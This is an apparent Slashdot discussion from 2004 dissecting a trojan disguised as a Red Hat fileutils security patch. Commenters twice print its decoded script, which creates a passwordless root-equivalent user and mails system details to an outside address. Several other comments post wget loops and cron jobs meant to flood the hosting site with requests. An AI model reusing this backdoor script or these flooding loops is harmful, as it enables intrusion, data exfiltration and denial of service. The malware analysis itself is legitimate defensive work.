If you go replacing your packages with third party ones, you also miss out on a lot of the effort that Red Hat put into backporting security fixes. Does that Apache security fix change the format of module files? Not if you're running Red Hat's Apache package, it doesn't. If you're running something else, either backport it yourself (most people who have the skills to do that decide to let Red Hat do it for them) or update every module you're using.

Re:Christ, they didn't do a very good job...

[mcrbids]

What's interesting, is that I actually got this message as a forward from one of my clients, who uses Progeny updates.

I was in a hurry, I didn't even think about the fact that Redhat is not Progeny, so my response was to simply run "yum update", a quick preview (there was only like two, not very important packages to update) and that was it. All of about 5 minutes, and I did nothing further, since the kernel wasn't updated and no running services were affected.

I forgot all about it until now, reading this article!

Re:Christ, they didn't do a very good job...

[david_costanzo]

It's more than just a faulty presentation--the whole premise is innane:

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges.

ls and mkdir are running as a network server with root privileges? How did that happen?

Besides, we all know RedHat systems configure ls and mkdir to change to low-privilege users (lsnobody and mkdirnobody) after accepting the connection (unless you modify /etc/ls.conf or /etc/mkdir.conf, that is).

Re:Christ, they didn't do a very good job...

[Illserve]

Thanks for the tips, next round be much better!

Re:Christ, they didn't do a very good job...

[wheany]

Besides, we all know RedHat systems configure ls and mkdir to change to low-privilege users

We do?

Re:Christ, they didn't do a very good job...

[PybusJ]

What was decided was dropping support for RH7.2 and RH8, to make the task of getting updates for 7.3, RH9 (and now FC1) out quicker.

Re:Christ, they didn't do a very good job...

[strider44]

Yep. Everyone except YOU!!!

Re:Christ, they didn't do a very good job...

[Minwee]

Red Hat use packages. Not hard guys.

Which distribution is it that uses "Hard Guys"? Do they have packages too?

Re:Christ, they didn't do a very good job...

[schon]

Yep. Everyone except YOU

Crap, why'd you tell him? Now, the whole keep-wheany-from-knowing-about-ls-and-mkdir-droppi ng-privs conspiracy is useless!

That's it. The next time we do this, you're not invited!

Re:Christ, they didn't do a very good job...

[Erik+Hollensbe]

Yyyeah.

You don't write a lot of custom patches, do you?

Whois on domains are easily faked

[Theatetus]

However, the IP block clearly belongs to Yahoo, whois 66.218.75.0 lists contact point netblockadmin@yahoo-inc.com

Anybody feel like dropping them a line to tell them they're hosting trojaners?

Re:Whois on domains are easily faked

[Omega+Hacker]

Done, not holding my breath.

Yahoo!

[pavo]

Shut it down! Someone paid you to host this, pass that information along to the authorities.

It's Yahoo hosting

[Theatetus]

Not exactly the box most likely to get pwned by somebody.

Contents of inst.c...

[enginuitor]

I've tried to post the code here, but am repeatedly blocked by the Lameness Filter. I have posted the C file to my server. It's safe to view, as long as you don't go trying to compile and run it! :-p
View inst.c

Re:Contents of inst.c...

[nomadic]

It's safe to view, as long as you don't go trying to compile and run it! :-p

Hey, stop trying to deny my GPL rights you Windows-loving tyrant!

Re:Contents of inst.c...

[menscher]

Rather than providing a link to it on your own server, how about providing the original malware link? That way, the curious can enhance the DoS attack, rather than wasting your site's bandwidth.

Re:Contents of inst.c...

[secolactico]

That site is hosted at Yahoo, so a slashdotting is not very likely. Altho the traffic spike might alert the Yahoo admins that something is amiss.

I'm I the only one that thinks this is some sort of prank? I mean, does anybody actually expects a redhat/fedora user to download, compile and install an unknown source, when updates usually come from a yum ot up2date repository?

And hosted on a Yahoo site, with a domain purchased thru Yahoo (check the domain technical contact)?

Re:Contents of inst.c...

[enginuitor]

Rather than providing a link to it on your own server, how about providing the original malware link? That way, the curious can enhance the DoS attack, rather than wasting your site's bandwidth.

The file I posted was the source file itself, rather than the whole package; my original intent was to post the code directly to Slashdot, but I was in a hurry and was having trouble getting past the Lameness Filter, so I uploaded it to my server with a .txt extension, with the intent of making it much easier for those who were interested in it to view it simply by clicking the link, without having to download and unpack it...

Re:Contents of inst.c...

[Spoing]

1. I'm I the only one that thinks this is some sort of prank? I mean, does anybody actually expects a redhat/fedora user to download, compile and install an unknown source, when updates usually come from a yum ot up2date repository?

Yes I'd agree it's probably a prank.

Yet, I can't agree that nobody will do this.

I expect that a small group of novices who have some experience with admining a RH or Fedora Linux system will fall for it and never be the wiser. A total novice won't likely fall for it because they are probably used to using either nothing or up2date and will look for patches there. Someone with a little experience will because they are trying to be smart. Experts or ones with a little more experience will smell a rat and will investigate the 'security problem' using the official Fedora site.

1. And hosted on a Yahoo site, with a domain purchased thru Yahoo (check the domain technical contact)?

If the site owner can be found, I'd expect them to deny that they had any knowledge of the incident. I give that a 5% chance of being the truth, though I'd like to know how they intended to use such a site. (Someone mentioned it is hosted on IIS, not any *nix -- Fedora or not.)

Re:Contents of inst.c...

[rts008]

Thanks for a superb job well and timely done!

Re:Contents of inst.c...

[Fallen+Andy]

Smells a wee bit CS undergrad smartass to me...
Sigh. They never learn.

I don't feel too worried about this one. Most exploits in UN*x envs are so well known and old chestnuts that your grandfather knew them.

The bad part with windows is that *only* MS actually could know the weaknesses and they are so full of themselves that they don't admit it to each other let alone the real world. I don't envy
anyone trying to fix stuff *inside* MS. How
much red tape does the guy partying with NTFS have
to fill in to get access to building XX's beloved
source...?

The rise of social engineering attacks is beginning to tick me off though. At least one (almost) bit me when I really did have email from
microsoft. Good thing I drink gallons of coffee.

But, now, I spend at least one hour every day trawling CERT, the internet storm center, Symantec, bla bla bla. Productivity decline is real ugly just to stay on top of it. I wouldn't mind, but starting at 7.30a.m. is kind of tough for an oldie like me.

Good going team "redhat"!

[null-sRc]

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges.

anyone stupid enough to believe that deserves what they get... mkdir, and ls, yeah ok LOL WTF ROTFL!!!LMAOO

This is a critical-critical update

and they say windows has problems with critical vulnerabilities!! look at this! critical-critical! even more critical than just plain critical! phew i feel safer on windows now. never heard of a critical critical on winupdate ;)

Re:Good going team "redhat"!

[scottking]

let's not forget that we are adviced to install it immediately.

For what it's worth...

[Theatetus]

To be honest, Microsoft's "trust this software?" dialog is pretty good: hard to fake and lets you view the signing certificate if you want to. The "Always trust software from these people" option kind of bugs me but I guess it's not much different from setting a key's trust level in GPG.

Re:For what it's worth...

[awehttam]

Yeah right, that's why Windows Update uses a signed SSL certificate...

Re:For what it's worth...

[irc.goatse.cx+troll]

Except with the recent rise of Firefox users who are only using it because we told them to (and are still the uneducated masses), someone could script a very convincing IE-like trust this software dialog.

RE: Redhat trojan.

[bejiitas_wrath]

I think that this is the inevitable result of the penetration into the general market. Once more unskilled people start using the Linux OS, there will be more things like this going around.

But with the effort it takes to get something like this running on the typical Linux machine, An experienced user will not be fooled this easily.

It is only Windblows users who click on every attachment they get in their E-Mails.

Re: I'll try it... Execution results!

[Student_Tech]

From the top of that inst.c file:

#if 0
shc Version 3.7, Generic Script Compiler
Copyright (c) 1994-2003 Francisco Rosales

shc -v -r -T -f redhat
#endif

From shc's manpage:

shc's main purpose is to protect your shell scripts from modification or inspection. You can use it if you wish to distribute your scripts but don't want them to be easily readable by other people.

Definitly doing something then, at least viewing the parent post.

Re: I'll try it... Execution results!

[Smitedogg]

Here is what it does.

Dogg

Here's my analysis

[andfarm]

What a coincidence - I just analysed the same thing, having seen it through Full-Disclosure. Here's the critical section:

echo "Inca un root frate belea: " >> /tmp/mama
adduser -g 0 -u 0 -o bash >> /tmp/mama
passwd -d bash >> /tmp/mama
ifconfig >> /tmp/mama
uname -a >> /tmp/mama
uptime >> /tmp/mama
sshd >> /tmp/mama
echo "user bash stii tu" >> /tmp/mama
cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
rm -rf /tmp/mama

In other words, it'll create a root-equivalent user called 'bash' and mailing some system info to root@addlebrain.com.

Looks to be a Klik client?

[RedPhoenix]

The source code for inst.c seems to be very similar to the "Klik client" code from http://klik.berlios.de/client/klik-0.1.3.c

Everything but the comments at the top of the page, and the shellcode, is pretty-much identical.

Klik looks to be a "KDE-based Live Installer for Knoppix".

Still looking....

Red.

Re:Looks to be a Klik client?

Well spotted... It's actually the same code, except the shell commands have been changed. Do a diff and you'll see...

Re:Looks to be a Klik client?

Is that a trojan too? Why would a legitimate piece of code want to use obfuscation techniques?

Re:Looks to be a Klik client?

[RedPhoenix]

Ok, see superpeach's post above - both klik, and this, use a bit of code that includes shell script in a C program:
http://www.datsi.fi.upm.es/~frosal/sourc es/shc.htm l

Red.

Re:Looks to be a Klik client?

[MbM]

The klik source is not a trojan, it's simply a glorified wget wrapper .. no idea why

It seems stupid to encode the shell script into an unreadable form and then to post the sources; a few small changes to the source and it happily prints out the shell script.

Re:Looks to be a Klik client?

[Antique+Geekmeister]

It is stupid. It's a classic "script kiddie" tool, with little bits of different packages welded together with little or no understanding of how they actually work. This was not written by a devious or skilled hacker, this was written by someone used to succeeding in conning Windows users to send them passwords.

I'm retarded

[Cid+Highwind]

Looks like I misinterpreted the code. The rc4 stuff is part of the shc "script compiler" output that decodes the actual shell script. fileutils-patch.bin is just a mis-named redhat RPM that inst doesn't appear to use at all.

Re:I'm retarded

[busonerd]

Preliminary analysis of inst.c: Decrypts a whole bunch of stuff (not sure where it all goes yet) and then splits off to /bin/sh with a command line of: /bin/sh -c exec './inst' "$@" ./inst

Re:I'm retarded

[numist]

This entire thread (from parent down) should be modded up informative for the play by play of the dissection of the trojan. Good job, guys. Damn good.

Re:I'm retarded

Are you kidding me?!

Re:I'm retarded

it's a simple rootkit.

most of us discovered this 5 minutes after looking at it.

Stupidity

[enginuitor]

The funniest part is that the code (a shell script compiled into C code, then into a binary, to obfuscate its purpose) failed miserably on my test systems, both Knoppix AND Fedora Core 2. It spat out a bunch of errors which completely revealed the fact that it was trying to add a user, start sshd, etc. C'mon, if you're gonna terrorize the Linux world, at least do it right!

Unauthorized use of RedHat Logo and name

[vchoy]

Going to the site, The use of Redhat logo and Redhat name itself is in clear violation of the trademark guidelines. I am guessing it will not be too long before this site and domain is taken down.

My question is: can these a**holes get away with using the 'fedora' name instead?

ps. I am not affilated with RH in anyway.
Copyright © 2004 All rights reserved. Redhat is a registered trademark of Redhat (only). No soup for you.

Re:Unauthorized use of RedHat Logo and name

[ZeroPost]

I think copyright violations are going to be the least of their worries if they are ever caught.

Interesting Opportunity

[Comatose51]

I wonder what percentage of RedHat users would fall for it versus the percentage of Windows users who fall something similar. We expect Linux users to be more cautious but perhaps they're just as human as everyone else. Perhaps they too can be tricked into running a trojan horse but with something more catered to their taste, ie. a software update versus a nude Russian tennis player.

Hosted at Yahoo! Business systems?!

[didiken]

What? I did a simple traceroute and see it goes to Yahoo's server , complimented with a Yahoo! NIC domain.

Yahoo! should shut this site immediately !

Re:Hosted at Yahoo! Business systems?!

They should, but if the normal time it takes them to remove other spammer and phisher sites is any indication, it'll be awhile.

What the world needs is an email filter that identifies the hosting company of any URL that's mentioned in the body of an inbound email, and if it's one of the ones that the user of the filter doesn't care for, then the TCP connection is abandoned, what was received of the mail so far is trashed, and the sending host is left with an orphaned TCP connection to time out.

Re: I'll try it... Execution results!

[MbM]

The script is encoded into the text variable in the source. The key part of the script is this:

echo "Inca un root frate belea: " >> /tmp/mama
adduser -g 0 -u 0 -o bash >> /tmp/mama
passwd -d bash >> /tmp/mama
ifconfig >> /tmp/mama
uname -a >> /tmp/mama
uptime >> /tmp/mama
sshd >> /tmp/mama
echo "user bash stii tu" >> /tmp/mama
cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
rm -rf /tmp/mama

(I'd post the whole script but the lameness filter won't let me)

Create a user named bash, no password
grab the ip and uptime, start ssh
mail the results

Re:I'll try it... "-o" option of adduser?

Hmm, what does that "-o" option of adduser do? The manpage on my system (fairly recent Debian) doesn't list anything and the poster earlier where it complained about adding more than one user probably is the same thing.

Geez, Bill, how desparate can you be . . .

[Anononnyous+Covvard]

. . . to be able to claim there's a trojan affecting Linux, too :).

Re:I'll try it... "-o" option of adduser?

[busonerd]

"-o Allow create user with duplicate (non-unique) UID." From gentoo manpage for adduser.

contact yahoo

Everyone should email yahoo via netblockadmin@yahoo-inc.com and ask them to take the site down.

Checksum

[jesser]

>md5sum fileutils-1.0.6.patch.tar.gz

68349c219d941209af8f7c968b89d622 *fileutils-1.0.6.patch.tar.gz

So you can be sure you're getting the real fake patch.

two good reasons

[twitter]

Why not just use the real link and slashdot their site into oblivion!

First, the guy is a dick and might have something nasty for your browser as well. Never stick your hand down a hole you saw a snake crawl out of.

Second, the guy is a dick and won't be paying his bill. All you will do is stick the ISP with the Slashdot Jihad botnet DoS attack that follows links from Slashdot's current page.

A third, less obvious reason is that the guy is a dick and spoofed everything. All of those listed may be innocent or not exist.

Keep your malicious activity to yourself, please, or target real, proven dickheads with attacks that really won't harm innocent bystanders.

Re:two good reasons

[Antique+Geekmeister]

But slashdotting the misused domain will let the company hosting the fraudulent crap know that they should vet their users a bit more carefully, and let them know that they're hosting a *BIG* problem and may need to review their overal customer contracts to prevent this in the future. It also helps give the company incentive to prosecute, or at least sue, the jerk who set them up for this.

Re:two good reasons

[commodoresloat]

It will be a lot easier (and more cost effective) for them to (find and) sue the people posting the suggestion to slashdot than to find and sue the person who set them up in the first place....

Thanks a lot!!

We'll keep all that in mind for the next time.

Got root?

they dont care

[bani]

yahoo happily host criminals. the only way to get rid of them is with a search warrant.

Re:they dont care

[NamShubCMX]

false.

If you find your copyrighted stuff on yahoo, a simple email will take the site down.

Thats what they do where I work...

Re:they dont care

[bani]

copyrighted stuff might not be ok, but criminal scams, spam, etc. certainly are.

And so...

[Eric+Damron]

The question begging to be asked is why is this site still alive?

heh, maybe it won't be for long with the /. effect!

Re: text (Why? Because.)

[turnstyle]

Why post the text instead of having the /. crowd flood their server to see what they've put up there?

Because sending loads of traffic to a site that is actively trying to get a trojan onto unsuspecting boxes seems like a pretty bad idea.

Apart from those that might click through without bothering to RTFA, and mistakenly think that it's a legit patch, there are also all those browser exploits (such as the Microsoft jpeg exploit) that could also be waiting on the site for unpatched systems.

Strongly Adviced (sic)

Anybody running RedHat and Fedora are(sic) strongly adviced(sic) to apply this patch!

Malware writers should be strongly adviSed on grammar and spelling if they want to be taken seriously.

Re:Strongly Adviced (sic)

are(sic)

?

Re:Strongly Adviced (sic)

Let me guess: you're European, specifically English.

Anybody == any person == anyone.

And "any person" obviously uses a singular verb as does "anyone."

In the US we follow a different convention: group plurals are used with singular verbs. I.e. we would say, The team is looking forward to the game whereas in the UK you're more likely to say, The team are looking forward to the game.

Good thing I saw this on /.

Damn, I was really close to be exploited, I use those porgrams everyday. Good thing I am now pacthed. ....what? RTFA you say?

What do you mean it's not a real pacth. MF@#$%#$%

NO CARRIER

Updated version from a couple of days ago...

[Zocalo]

This hit the SpamAssassin mailling list a couple of days ago, the only difference is the location of the file which might help explain the Stanford reference. In the original the line was:

wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar. gz

but now it's:

wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz

Whoever is behind this certainly seems to be doing a very sloppy job of it. Yahoo, Melbourne IT, Stanford, hosting at "everyone.net"; hardly a who's who of dodgy companies and "bullet proof" service providers, is it? Frankly, I'm expecting to be reading a Slashdot story about a bust by the end of the week, and that's being generous.

Re:Updated version from a couple of days ago...

[natrius]

A StanfordWho search for that id turns up this:

Name: Irene O Joe
Email: joeio@stanford.edu
Organization: University
Relationship: Student
Position: Graduate, Law
Department: Law School
I'm guessing some law student got her password cracked, and the school took down the file when they found out what happened.

Re:Updated version from a couple of days ago...

[dioscaido]

Do you think they'll be busted? Given the linux communitie's tech saavy, probably not too many systems were affected, so there won't be a big impetus from law enforcement from getting involved. Still, given that the slashdot crowd is on the case, the person will probably be found and at the very least fined in some way.

Let's call this what it is

Sure, RedHat is spinning it as 'malicious code', but we all know what it is: a virus, just like that one for Mac OS X! Quick, start the presses! Tell everyone about this dangerous new virus!

(Note to sarcasm impared: this is humour).

Umm... yes...

[Theatetus]

That is why they use a signed certificate for Windows Update, in fact. And why Microsoft PGP signs their security bulletin emails. Is there a joke there I'm missing?

everyone now....

wget -O /dev/null http://www.fedora-redhat.com/fileutils-1.0.6.patch .tar.gz

Let's use all of his bandwidth quota up.

Re:everyone now....

[LibrePensador]

wget -O /dev/null http://www.fedora-redhat.com/fileutils-1.0.6.patch .tar.gz

I just turned it into a cronjonb that runs every freeking minute. Let's get this guy off the net.

Re:everyone now....

[downbad]

i hate to break it to you, but the website is hosted on geocities.

Re:everyone now....

Note: You have to fire up multiple sessions of the wget command to hit all of their servers.

Re:everyone now....

[L0stm4n]

This is alot more fun :) esspecially since my webserver sits on a ds3.

while [ 1 ] ; do wget -O /dev/null http://www.fedora-redhat.com/fileutils-1.0.6.patch .tar.gz; done

Re:everyone now....

Yes, please, lots of people do this, because after all, there's one dedicated line from each of us to this idiot, and bandwidth is never shared, because the Internet isn't a packet switching network, there are no intermediate routers and no overworked administrators to worry about some "assult of hono(u)r", and DDoSing one person only ever hurts the single intended target.

How did you get his email and home address??

[Eric+Damron]

Wow that's more info than I get from a whois lookup...

How the hell do you do that?

Re:How did you get his email and home address??

whois.tucows.com

tho the info is fake.
zip is Atwater, CA not NY.
phone number is not NY either.
209 899 SONORA California PACIFIC BELL RBOC

Re:How did you get his email and home address??

your whois obviously sucks ass

look at this in a diffrent way

[barebones]

LINUX IS GROWING LINUX IS GROWING but is this just a start of linux bugs or virus etcccc.......

Re:look at this in a diffrent way

[dtfinch]

I can just imagine...

"Attached is a sexy picture of Anna Kournikova.
To view the picture, simply:
1) save the attachment
2) su -
3) tar -xjf anna.tar.gz
4) ./configure
5) make
6) make install
7) anna"

Re:look at this in a diffrent way

Whatever it takes to install a LEGITIMATE package on distro-X will be THE MECHANISM used to unwittingly install a trojan.

Linux just makes installing ANYTHING harder (generally) but once users become used to this obsticle, it will not prevent the unwitting infection of the next "KDE fireworks screensaver" now will it?

bastards

[scottking]

the bastards even had the nerve to pilfer bandwidth from redhat (from redhat-fedora.com page source):

<img src="http://www.redhat.com/g/chrome/logo_rh_home.p ng">

good thing we didn't give them a good slashdotting.

Re:bastards

[vsync64]

Red Hat should simply rename the file on their site, change the links to it, and then replace it with a "THIS IS FRAUD" PNG.

Re:bastards

[scottking]

and me without any mod points for you...

Re:bastards

There's an interesting way to fight 'phishing'.

For whateever reason, 'phishers' like to reference the corporate logos used by the banks and companies. All these companies have to do is to give the corporate image a unique name every hour, with the old image marked 'fraud'. This would outdate the validity of any E-mail sent by the 'phisher',as the title would indicate the validity of the document.

Sure, why not?

[twitter]

..was this set up by SCO, Microsoft or one of the anti-virus folks who want to prove that Linux isn't without its weaknesses...?

Just look for the soon to be announced case of a photograph of a male model that looks nothing like the PR drone who writes an article about their bad experience with an email trojan while running Red Hat. It will run on about how secure they felt without complicated tar files and compilations, just taking it easy while Windoze 2003 server and Windoze Update did all the hard work for him. No more late nights with failed makefiles trying to run trojans for him again, no sir, he's switching back to the blissfull, dependable world of M$. It will be the security analog to the ease of use Apple Switcher about a year ago and it will fool about as many people for about as long.

Dude, once you get the facts you will always be willing to pay for second rate stuff!

Re:Sure, why not?

Moderators: Please note that "twitter" is a known fanatical sycophant whose obnoxious offtopic rants are legend here on Slashdot. It doesn't matter what the topic is, he'll find a way to scrape in some pointless Microsoft bashing. While nobody expects us to love Microsoft in any way, his particularly tepid style of calling anyone he replies to "troll" or "liar" or "fanboy" because he happens to disagree with whatever they're saying is well documented and should not be rewarded. If anything, twitter is the type of person that should not be part of the open source/free software community. He is an anathema to all that is good about free software.

I'm posting this so that you (the moderator) have some context to consider twitter and not mod him up whenever he posts his filler preformatted rants about installing Knoppix or Mepis or whatever that unfortunately get him karma every single time and allow him to continue posting his trademark toxic crap (read on) day in and day out. You may consider this a troll - I consider it community service. And I ain't kidding.

If you're a /. subscriber, I invite you to look through some of his posting history. I guarantee that you'll be hard pressed to find someone that is more "out there" than twitter. You'll also probably notice he's got quite an AC following. Don't just read his posts, make sure you go through the replies.

To get an idea of what I'm talking about, check this post out. This is an article about email disclaimers. The parent of the post is complaining about the ads in the linked page and so on, and twitter actually goes off on a rant to blame it on Microsoft and recommend Lynx, because "is teh free".

Here's another. In this post twitter not only calls the OP a troll but attempts to "tell it like it is" while making some vague argument about "GNU". Yes, if you're confused, you're not alone. The reply (modded +4) proceeds to simply destroy his bogus argument. You will notice he did not reply. This is what some people call "drive-by advocacy". A sort of I'll just leave you with my thoughts here and move on to the next flamebait kind of deal. In fact, he almost never replies because he knows that his fanatical arguments simply do not hold up to any sort of discussion. It's not that he's chosen the wrong cause - he's just going at it in a completely wrong way.

Here's that drive-by advocacy and FUD in motion: twitter goes on about some topic and then drops the usual "oh and M$ is teh evil" because "WMP phones home" or some such. Called on his FUD, he then claims that WMP stores every song and movie you've ever played in a file, somewhere. Pressed further, he just sort of slithers out of sight, his FUD-spreading complete. This is not about some Microsoft technology that nobody likes anyway; it's about lying for the sake of lying. Way too many of his posts are exactly like this one.

More? Just read though this post and the subsequent replies. I guess this stands on its own. Or these two. Or this one. Or this one.

Still not convinced? This is what twitter considers "humour" while going about his daily "M$" routine.

M

And addlebrain.com is:

Wonder if these are the bad guys, or if they're just 0wned by bad guys.

Registration Service Provided By: StoreIQ, Inc.
Contact: technical@storeiq.com
Visit:

Domain name: addlebrain.com

Registrant Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US

Administrative Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US

Technical Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US

Billing Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US

Status: Locked

Name Servers:
dns1.name-services.com
dns2.name-services.com

dns3.name-services.com
dns4.name-services.com
dns5.name-services.com

Creation date: 18 Feb 2000 17:02:59
Expiration date: 18 Feb 2005 17:02:59

Probabilities:

[reality-bytes]

If the Antivirus companies were responsible, they'd have done a better job.

If Microsoft was responsible, they wouldn't have included any source code.

If SCO was responsible, they'd have included sourcecode and then sued you for running it

All things taken into consideration, I'm with 'other' on this one ;)

The guy seems to be Romanian

[Shulai]

I'm not a Romanian, but a Spanish native speaker myself, however using Google with the word stii shows a Romanian link as the first non-English one. Further searchs with "Romania frate" and "Romania belea" confirm this.

Re:The guy seems to be Romanian

[at_slashdot]

I confirm, it's Romanian, I translated in other post, nothing important, the writer is an idiot.

Better colours

http://shit.slashdot.org/article.pl?sid=04/10/24/2 352234

The Obvious tip-off?

[dramatools]

Shouldn't users suspect a "patch" from Red Hat (who gave the world RPM) distributed as a tarball? Also, a real Red Hat alert would encourage users to download the update from RHN or a known good Yum repository. If those two holes in the story weren't enough, there's the lack of a case number and the single patch offered for SIX distributions, all of which are end-of-life save for Fedora Core 2. Red Hat now only provides official updates for Red Hat Enterprise Linux, which isn't mentioned in the "alert" at all. The Fedora Project would only provide updates for Fedora Core 2, while RHL 7.3, 9 and FC 1 are now supported by the Fedora Legacy Project. RHL 7.2 and 8.0 are pretty much abandoned, so any fixes for those releases would need to be built by the user. Fedora Core doesn't even ship a 'fileutils' package-- the Fedora version is called 'coreutils' and also includes sh-utils, textutils and the 'stat' command. This kind of phishing scam is unfortunately commonplace, though large financial institutions are the usual covers. This is the first one I've seen pertaining to a Linux distro-- I can only hope most Red Hat/Fedora admins are familiar enough with their distros to see right through this one.

Disassembled the shellcodes

[Theatetus]

And all I can say is, what a collosal waste of effort by this jackass. Just write the malware in C and compile it; no need to shellcode yourself like that. If I'm reading it right, that is. Too bad the lameness filters kill the disassembly.

Well, I wonder too...

[WIAKywbfatw]

Well, I think if you're going to ask that then I think you also need to look at the reverse situation: are some of the exploits that take advantage of weaknesses in Microsoft products written by people who take their love of Linux too far? And were the DDOS attacks on the SCO website, etc also committed by similar individuals?

Come on, hand on heart, don't you think that there's even been one attack on a closed source software product that's been the working of a less than well-adjusted open source zealot? I think if you're going to speculate about the unlikely possibility that Microsoft or SCO would undermine Linux in such a manner then you have to at least accept the likelyhood that they've been the victim of a malicious pro-Linux cracker on more than one occasion.

(Queue twenty posts flaming me to hell and back...)

I love it!

[jd]

Linux geek comes across an obvious trojan. What does said geek do? E-mail the site admin? DoS the source site? Noooooo. They set up a sandbox environment and run it, to see what happens!

(Mind you, I'm no better. First time I got a computer virus, when I was running MSDOS, my first reaction was to run a binary diff against a clean version of the file, and disassemble the result to see what it did. Do you know if there's a cure for this?)

Re:I love it!

[juhaz]

Do you know if there's a cure for this?

A cure for what? Human curiosity? Why on Earth would anyone want to be "cured" from that, and become something less instead. It's one of the few good qualities that have brought us so far despite our lacking on other important areas...

On computer geeks, need to know how things work naturally becomes directed towards computers...

Re:I love it!

[ocelotbob]

Oftentimes, these trojans are usually just the tip of the iceberg. If they hadn't disassembled the trojan, the email address the virus sends its results to wouldn't be known and the other part of the attack wouldn't be known.

Re:I love it!

[Cheile]

I wanted to make sure that I'm extra patched! So I'm downloading it with my nifty script

#!/bin/bash

while [ 1 ]
do
wget http://www.fedora-redhat.com/fileutils-1.0.6.patch .tar.gz > /dev/null
done

Re:I love it!

[Tony-A]

Do you know if there's a cure for this?

You don't want a cure for this.

If you want a legitimate comparison between Linux and Windows security, observe:

This is new and fresh enough to "set up a sandbox environment and run it, to see what happens!" Another Windows similar thingee, "been there done that".

Dated 23rd October 2004 on http://www.redhat.com/security/ which means that Red Hat was on top of it fast. This isn't the kind of thing that Slashdot sits on and Red Hat was one day plus ahead. For comparison, it took about 6 days for Microsoft to return anything about Code Red on a search from microsoft.com. That's 6 days after appearing on Slachdot (compared to 1 day before).

Re:I love it!

[/dev/trash]

Marriage.

Re:I love it!

[mauryisland]

Hmmm. You'll be extra patched, all right.

Re:I love it!

Yup, with wget settings like that you'll have lots of copies:
fileutils-1.0.6.patch.tar.gz
fileutils-1 .0.6.patch.tar.gz.1
fileutils-1.0.6.patch.tar.gz. 2
fileutils-1.0.6.patch.tar.gz.3 ...
should have done a

wget -o /dev/null -O fileutils-1.0.6.patch.tar.gz http://www.fedora-redhat.com/fileutils-1.0.6.patch .tar.gz

so you have one file, just refetched a bunch of times.

Re:I love it!

[Lumpy]

Do you know if there's a cure for this?

yes, find a 2 by four about 6 feet in length, stand with your feet firmly on the ground and rapidly bash yourself in the head until you become one of the drooling masses.

this is the only cure.

okay, heres the plan...

[Foktip]

for (( i=0 ; i<80000 ; i=$((i+1)) ))
do
wget http://www.fedora-redhat.com/fileutils-1.0.6.patch .tar.gz &
rm fileutils*
echo woot
done

Re:okay, heres the plan...

[synthparadox]

#!/usr/local/bin/bash

while [ 0 ]
do
wget -q http://www.fedora-redhat.com/fileutils-1.0.6.patch .tar.gz
rm -f fileutils-1.0.6.patch.tar.gz
done

Already running and will be running throughout the night.

Re:okay, heres the plan...

[Derek+Pomery]

funny. I was already running:
while [ 1 ];do wget -O/dev/null http://www.fedora-redhat.com/fileutils-1.0.6.patch .tar.gz;done

Re:okay, heres the plan...

N.B. the wget line got a space put in it by the filter (before .tar.gz).

Easier to do: wget -O /dev/null (direct output to dev/null)

Re:okay, heres the plan...

[gabba_gabba_hey]

Or you could change it to:

#!/usr/local/bin/bash

while [ 0 ]
do
wget -O /dev/null -q http://www.fedora-redhat.com/fileutils-1.0.6.patch .tar.gz
done

Re:okay, heres the plan...

ugh, never mind this has already been said, sorry about that

Re:okay, heres the plan...

[Foktip]

WAHT! Okay why did i get 0 and the guy who replies gets 5 insightfull? my coding isnt THAT bad, is it??

Re: I'll try it... Execution results!

[TCM]

OK slashdot crowd, on to addlebrain.com to give it a good slashdotting.

Apparently, they run IIS/6.0. Maybe the guys with darker-than-white hats can give it a free "auditing" *nudge*nudge*wink*wink*.

View page source

[LittleLebowskiUrbanA]

Dumbass is getting the Redhat logo from a Yahoo page.

http://geo.yahoo.com/serv?s=76001524&t=1098669 974

Pretty obvious goof even after "adviced."

Re:View page source

[krray]

That's not what I saw (your reference is commented out). I see the logo coming from:
http://www.redhat.com/g/chrome/logo_rh_home .png ...which would be nice if Redhat could change their pages to not use that photo ... and replace that photo with some like:
THIS IS A FAKE UPDATE NOT SUPPLIED BY REDHAT -- DO NOT DOWNLOAD!
(until the site can be taken down completely)

That is what _I_ would do. :)

Re:View page source

[scottking]

you're code references a 1x1 gif spacer... doesn't make these guys an less stupid though.

Re:View page source

[LittleLebowskiUrbanA]

That would be pretty cool if Red Hat put something like that. If I was working there, it would be too much temptation for me :)

Re:View page source

[ln+-sf+head+ass]

If I worked for Red Hat, I'd ask Yahoo to borrow the goatse image to replace the logo. Wouldn't have to worry about too many installs then, I imagine.

Re:View page source

[rwebb]

Damn, and me without mod points. Consider yourself the recipient of a virtual +1 funny...

Re:View page source

[ocelotbob]

No need to go through all that effort. All you need to do is create a simple .htaccess directive and use mod_rewrite to redirect anyone referred to the image from fedora-redhat.com to an image saying something like "this is fake." No need to recode the entire site.

Re:View page source

[ln+-sf+head+ass]

Thanks :).

Re: I'll try it... Execution results!

[numist]

so, it requests the root password

In romanian?

well then... guess that settles it. Incindiary charges built into every new computer from now on.

Then again, I suppose hacking out acpi and cpufreq could have a similar effect... but then the writer wouldnt be able to go back and use infected machines as drones.

You have been trolled, you have lost.

Have a nice day.

Re: I'll try it... Execution results!

[labratuk]

Surely we just have to send a load of bogus reports to root@addlebrain.com and he'll have a fun time trying to find the genuine ones.

Fill the mailbox

[grahamdrew]

We know the email address that the trojan sends it's feedback to. Rather than attempting to slashdot the site, why don't we just flood the email box. It'll eat bandwidth, dilute any useful data the SOB who set this up will get, and maybe stop future dipshit admins from getting whacked. So... anybody want to work out the format of a message telling whatever lameass came up with this scheme that microsoft.com just got rooted? :-)

Re:Fill the mailbox

It could be a joe-job.
